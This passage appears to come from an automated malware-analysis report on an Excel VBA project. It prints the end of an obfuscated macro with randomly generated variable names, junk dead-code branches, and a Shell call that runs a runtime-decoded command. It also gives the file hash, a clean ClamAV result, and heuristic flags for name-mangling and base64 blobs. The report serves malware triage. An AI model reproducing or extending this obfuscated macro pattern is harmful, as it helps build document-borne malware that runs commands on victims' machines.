Dim LUhuszkQBcXyAZrfRgZWArpnArOafAhyVivm As String
End If
Shell ujJoUYppBnLKtVHRtxixsYzhpaFc(Urarx), MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO
Dim CfCPyRbfovsXsfqfuQnUftuBkJlBvZcReEdleJYiQJyE As Integer
If 38 = 57 Then
Dim yqizJBDEuaHIkAeogakP As Date
Dim TasnCFBlsFEVuqCublruVXWExUAdejCqZjkYxuxEzRMpVl As String
End If
Dim NuykNviptvDoqhEXHICOvLFdxgnmuEKhiMGGeuW As Integer
If 51 = 43 Then
Dim HHjqoVIEQAcKEmHpC As Date
Dim oVmgHwvplWGdbxsNlvHLVQIocXlStGuaWDRJHqzLoADyC As String
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 50688 bytes |
SHA-256: 129aa01b461cf9557760248972eded73fa6f3e3b7afd148f575219c369e9db7e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
907 of 1176 identifiers look randomly generated (e.g. 'yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhd') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.